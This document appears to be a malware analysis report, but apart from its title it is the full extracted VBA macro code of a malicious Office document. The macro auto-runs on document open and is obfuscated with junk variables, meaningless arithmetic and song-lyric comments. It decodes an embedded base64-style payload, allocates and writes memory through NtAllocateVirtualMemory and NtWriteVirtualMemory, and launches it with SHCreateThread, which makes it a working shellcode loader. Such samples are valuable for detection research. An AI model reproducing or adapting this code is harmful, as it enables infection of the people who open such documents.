Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim fatal As Integer
Dim incogitable As Byte
adverse = "stylite"
catostomidae = "sense"
bayonet
architeuthis = 3
high = 314
mauvais = 51236
sensational = 370050
sensational = SYD(sensational, mauvais, high, architeuthis)
End Sub
Function cinquecento(watershed, ammoniacal, coadjutor)
#If Win64 Then
Dim anoxemia As Byte
Dim designated As String
Dim odoriferous As LongPtr
Dim unpermissive As LongPtr
Dim accost As LongPtr
Dim rumple As String
Dim arcturus As LongPtr
Dim addable As LongPtr
#Else
Dim unpermissive As Long
Dim ahura As Integer
Dim odoriferous As Long
Dim apperceptive As Variant
Dim arcturus As Long
Dim maniclike As Integer
Dim accost As Long
Dim equator As String
Dim addable As Long
Dim friarscowl As Byte
Dim duckpins As String
#End If
pelican = pelican
predictive = Rnd(50.4779 + 344)
unpermissive = watershed
addable = coadjutor
ingulf = Fix(263.6453 + 479)
arcturus = ammoniacal
concoction = 7
nuts = 255
bowwow = 24772
obstructed = 578379
obstructed = SYD(obstructed, bowwow, nuts, concoction)

pelican = pelican
odoriferous = 88 + 42 - 52 - 79
fierceness ByVal odoriferous, unpermissive, arcturus, addable, accost
pelican = heroics
End Function
Sub max()
    With Documents("Example.doc").Windows(1)
        If .WindowState = wdWindowStateMinimize Then _
            .WindowState = wdWindowStateMaximize
    End With
End Sub

Function turritis(austereness)
Dim intensional As Long
Dim aldosterone As Long
Dim suspend As Variant
Dim glories As Variant
#If Win64 Then
Dim aid As Variant
Dim hasdrubal As LongPtr
appeachment = 17 - 102 + 93
Dim hemipteronatus As LongPtr
Dim bilobate As Long
Dim mohawk As Variant
Dim amended As LongPtr
Dim mortmain As Integer
#Else
Dim actiniopteris As Integer
Dim hasdrubal As Long
appeachment = 54 - 50
Dim hemipteronatus As Long
Dim illicit As String
Dim amended As Long
Dim consecration As Integer
Dim blastomycete As Integer
#End If
movere = cinquecento(VarPtr(hasdrubal), VarPtr(austereness) + 8, appeachment)
cutlas = 128 - 129
hemipteronatus = 50 + 107 - 157
alectoria = 0
amended = 9582
backslider = 29 + 3 - 30 + 4094
militia = 64
aseptic = pampered(ByVal cutlas, hemipteronatus, ByVal alectoria, amended, ByVal backslider, ByVal militia)
heroics = "pavo"

heroics = pelican

cinquecento hemipteronatus, hasdrubal, 4384
degressive = 7
sheltered = 345
bourse = 54158
podicipedidae = 563044
podicipedidae = SYD(podicipedidae, bourse, sheltered, degressive)

turritis = hemipteronatus
End Function
Sub bayonet()
Dim bacteriostat As Byte
Dim bud As String
protozoan = ThisDocument.ComputeStatistics(wdStatisticPages)
heavy.gadgeteer.Value = protozoan + 9
omnidirectional = "frizzly"
tvg = "baseball"
Set pheasant = heavy.gadgeteer.SelectedItem
alterant = 6
bells = 391
isotropic = 17509
amatory = 573237
amatory = SYD(amatory, isotropic, bells, alterant)

archebiosis = pheasant.Name
bristly = 115 - 9 + 43 + 5695
mush = Right(archebiosis, bristly)
balkline = philatelist.eclipse(mush)
adaptable = 100
agraphic = 15040
fray = 252633
agraphic = NPer(0.0496, adaptable, -24320, fray, 1)

clashing = "changing"
dower = "de" & "licat"
#If Win64 Then
Dim diazonium As Variant
Dim astasia As LongPtr
Dim academia As LongPtr
Dim baygall As Integer
#Else
Dim fatuus As Byte
Dim academia As Long
Dim noncombatant As Integer
Dim astasia As Long
#End If
concert = 92 - 67 - 5 - 20
dehumanized = "ap" & "hyllanthaceae"
glycolysis = 109 + 3987
nonviolently = 4
incensebreathing = 307
punjabi = 23905
faultless = 358133
faultless = SYD(faultless, punjabi, incensebreathing, nonviolently)

concatenation = "revelers"
goaldirected = "atavist"
trinectes = "preconditioned"
dagger = "diminuendo"
vaccinium = 5
aoudad = 391
whacker = 20872
naranjilla = 117852
naranjilla = SYD(naranjilla, whacker, aoudad, vaccinium)

brainwashed = balkline
pardonner = "ex" & "cern"
hijacking = "bullet"
astasia = turritis(brainwashed)
pratincole = "flooded"
gelechiid = "coexist"
#If Win64 Then
Dim fauteuil As Long
Dim glassblower As LongPtr
emphatically = "cardoon"
atherosclerotic = "grievous"
coaxial = "sass"
Dim chronography As LongPtr
craniotomy = 6 + 84 + 1222
#Else
crone = "partnership"
foxhound = "handsomely"
cognizable = "rein"
Dim glassblower As Long
easy = 24 + 15 + 456
Dim chronography As Long
craniotomy = easy + 2659

#End If
Dim amygdalaceae As String
Dim footcandle As Variant
glassblower = 0
academia = astasia + craniotomy
chronography = 113 + 6 - 64 - 54
cheers = ungovernable(academia, glassblower, chronography, glassblower)
solitarily = 5
adeem = 139
galan = 45095
piezoelectric = 136239
piezoelectric = SYD(piezoelectric, galan, adeem, solitarily)

End Sub



Attribute VB_Name = "philatelist"
' I know what you want, Baby, I'mma give it to you real good
' To the edge of the night to the light
' B-B-B-Baby, I'mma give it to you real good
#If Win64 Then
' Here bartender make it double, oop!
' Get it right, all night
' I know what your friends say
Public Declare PtrSafe Function racist Lib "Shlwapi.dll" Alias "PathFileExists" (changed As LongPtr) As LongPtr
' You know the song baby, tryin’ to get my top score
' Baby we should get it right
' You make me feel good
Public Declare PtrSafe Function rubiales Lib "Shell32.dll" Alias "SHGetSettings" (euderma As LongPtr,jackpudding As LongPtr) As LongPtr
' But they don’t know your appeal
' When they’re laying on the ground
' I know what you want, Baby, I'mma give it to you real good
Public Declare PtrSafe Function distend Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal nonmandatory As LongPtr,handerchief As LongPtr,wintergreen As LongPtr,unimpressible As LongPtr,primogeniture As LongPtr) As Boolean
' But they don’t know your appeal
' Put your motherfucking hands up!
' I know what you want, Baby, I'mma give it to you real good
Public Declare PtrSafe Function pampered Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (pulcinella As LongPtr, brushed As LongPtr, ByVal palter As LongPtr,covetousnessByVal As LongPtr, heighho As LongPtr, ByVal appointments As LongPtr) As LongPtr
'
' I'mma be around, maybe not as often as you like
' I know what you want, Baby, I'mma give it to you real good
Public Declare PtrSafe Function fierceness Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal preliterate As Any, ByVal dreamily As Any, ByVal capacious As Any, ByVal cola As Any, ByVal arcanum As Any) As LongPtr
' Cause I like your skinny-jeans better
' Baby let me get it right
' Put your motherfucking hands up!
Public Declare PtrSafe Function ungovernable Lib "Shlwapi  " Alias "SHCreateThread" (ByVal prudential As LongPtr, ByVal buckwheat As Any, ByVal sneaky As LongPtr, ByVal piles As LongPtr) As LongPtr
' Cause it’s 420 24/7 where I'm at, Hun
' To the edge of the night to the light
' To the edge of the night to the light
Public Declare PtrSafe Function hawklike Lib "Shell32.dll" Alias "SHGetDesktopFolder" (dreary As LongPtr)
' Put your motherfucking hands up!
' From the back to the middle to the front
' Get it right, all night
Public Declare PtrSafe Function publishable Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (monthly As LongPtr, sapit As Any,islamabad As LongPtr, foreshore As Any) As Boolean
' Put your motherfucking hands up!
' From the back to the middle to the front
' Get it right, all night

' Put your motherfucking hands up!
' From the back to the middle to the front
' Get it right, all night
#Else
' Put your motherfucking hands up!
' From the back to the middle to the front
' Get it right, all night
Public Declare Function flair Lib "Shell32.dll" Alias "SHGetDesktopFolder" (younger As Long)
' Put your motherfucking hands up!
' From the back to the middle to the front
' Get it right, all night
Public Declare Function bushel Lib "Shell32.dll" Alias "SHGetSettings" (atherinidae As Long, meagerly As Long) As Long
' You know the song baby, tryin’ to get my top score
' When they’re laying on the ground
' But they don’t know your appeal
Public Declare Function ungovernable Lib "Shlwapi  " Alias "SHCreateThread" (ByVal crab As Long, ByVal somniferous As Any, ByVal apollo As Any, ByVal ratability As Any) As Long
' And your kashmir sweater's nowhere to be found
' I know what you want, Baby, I'mma give it to you real good
'
Public Declare Function maxzide Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal momotus As Long, counterman As Long, murrion As Long, alternity As Long, castigator As Long) As Boolean
' But they don’t know your appeal
' I’ll make you feel high
' Cause I like your skinny-jeans better
Public Declare Function pampered Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (interrupted As Long, paenitentiae As Long, ByVal adumbrative As Long, campaniliformByVal As Long, actinomyces As Long, ByVal elbowing As Long) As Long
'
' Get it right, all night
' I just wanna do you real good
Public Declare Function emunctory Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (exulting As Long, busby As Any, amianthum As Long, paean As Any) As Boolean
' From the dark to the light
'
'
Public Declare Function entering Lib "Shlwapi.dll" Alias "PathFileExists" (mirth As Long) As Long
' Just gimme one day, I teach �em girls how to chill
'
' Cruisin’ down sunset, lightning up a fat one
Public Declare Function fierceness Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal countercurrent As Any, ByVal airman As Any, ByVal bechance As Any, ByVal scherif As Any, ByVal taxidermy As Any) As Long
' I'mma be around, maybe not as often as you like
' Baby let me get it right
' To the edge of the night to the light

' Baby take your top off, come to the right bay
' Back in L.A., oop! It’s a nice day
' Let’s make love, I never wanna fight
#End If
' Cause it’s 420 24/7 where I'm at, Hun
' I know what you want, Baby, I'mma give it to you real good
' From the back to the middle to the front
Sub dup()
    Dim Range1 As Range, Range2 As Range
    Set Range1 = Selection.Range.Duplicate
    Set Range2 = ActiveDocument.Bookmarks(1).Range
    Range2.Paragraphs(1).Range = Range2
End Sub


Function phycocyanin(autodafe)
phycocyanin = AscW(autodafe)
End Function
Function fixation(members, bassorilievo, disentanglement)
Select Case disentanglement
Case 24
fixation = members \ bassorilievo
Case 34
fixation = members And bassorilievo
Case 42
fixation = members * bassorilievo
End Select
End Function
Function burnable()
Dim packaged(255) As Byte
corvine = 65
Do
packaged(corvine) = corvine - 65
corvine = corvine + 1
Loop Until corvine = 91
corvine = 48
Do
packaged(corvine) = corvine + 4
corvine = corvine + 1
Loop Until corvine = 58
corvine = 97
Do
packaged(corvine) = corvine - 71
corvine = corvine + 1
Loop Until corvine = 123
packaged(47) = 63
corvine = 43
packaged(corvine) = 62
burnable = packaged
End Function
Function eclipse(ascosporic) As String
Dim concealing() As Byte
Dim communicating(63) As Long
Dim gerund(6965) As Byte
predictive = ingulf * 2

Dim chippy As Long
Dim overtolerance As Long
Dim incomprehension As String
Dim unintelligent As Integer
ingulf = cloyingly \ 499

Dim blechnum As Integer

Dim drawer As Long
Dim accidental(63) As Long
Dim unobeyed(63) As Long
pelican = heroics

Dim cowl As String

Dim meticulousness As Long
Dim artists As Byte

chewy = 26 + 74 + 16711580
calk = 70 + 122 + 261952
Dim endaemonism As Long

unamazed = 124 + 110 + 3862
lookd = 65536
hybrid = 23 + 63 - 23
Dim varicosis As Long

plowshare = 32 + 9 + 23
Dim anatotitan As Byte

fluxions = 255
cross = 256
bookcase = 105 + 3927
brythonic = 6 + 52 + 65222
agape = 111 - 29 + 257966
archaeopteryx = 64 + 62 + 16514946
Dim eggar As String
overcome = 0
illtreat = 113 - 105 - 63 + 5898
Dim acritical() As Byte
acritical = VBA.StrConv(ascosporic, vbFromUnicode)
Dim misery As Integer
nonfissile = 4
cherrystone = 236
boiler = 59123
wringer = 118264
wringer = SYD(wringer, boiler, cherrystone, nonfissile)

sonorousness = 5843
chacha = 124 + 65 - 154
dioristic = Sqr(100) / Sqr(4) + 20
For satyric = 0 To sonorousness
If satyric Mod 2 = 0 Then
acritical(satyric) = acritical(satyric) + dioristic
Else
acritical(satyric) = acritical(satyric) + dioristic - 1
End If
Next satyric
stanchion = 50
apostacy = 22009
cornice = 567133
apostacy = NPer(0.0323, stanchion, -19903, cornice, 0)

unintelligent = 0
assistance = 0
cyclothymic = 43
topaz = burnable
For overtolerance = 0 To 63
accidental(overtolerance) = fixation(overtolerance, plowshare, 42)
communicating(overtolerance) = fixation(overtolerance, unamazed, 42)
unobeyed(overtolerance) = fixation(overtolerance, calk, 42)
Next overtolerance
devilmay = 24
bambusa = 37441
algebraist = 173227
bambusa = NPer(0.0551, devilmay, -22837, algebraist, 0)

concealing = acritical
capped = 9 - 5
berg = 3
uppermost = 363
everlastingly = 11100
spittoon = 372003
spittoon = SYD(spittoon, everlastingly, uppermost, berg)

angustation = 117 - 114
cloyingly = Rnd(284.6617 + 327)

pelican = "confrication"

francoamerican = angustation + 1
chips = 2
For meticulousness = 0 To sonorousness
movie = concealing(meticulousness)
protractile = concealing(meticulousness + 2)
chippy = unobeyed(topaz(movie)) _
 + communicating(topaz(concealing(meticulousness + 1))) + accidental(topaz(protractile)) + topaz(concealing(meticulousness + angustation))
overtolerance = fixation(chippy, chewy, 34)
gerund(drawer) = fixation(overtolerance, lookd, 24)
overtolerance = fixation(chippy, brythonic, 34)
gerund(drawer + 1) = fixation(overtolerance, cross, 24)
gerund(drawer + chips) = fixation(chippy, fluxions, 34)
drawer = drawer + chips + 1
meticulousness = meticulousness + 3
Next
eclipse = gerund
End Function



Attribute VB_Name = "heavy"
Attribute VB_Base = "0{DDECB9B6-7C54-44A1-92D4-362E1A97CC55}{2DD12183-6312-47B3-8CF9-F7907A39D125}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False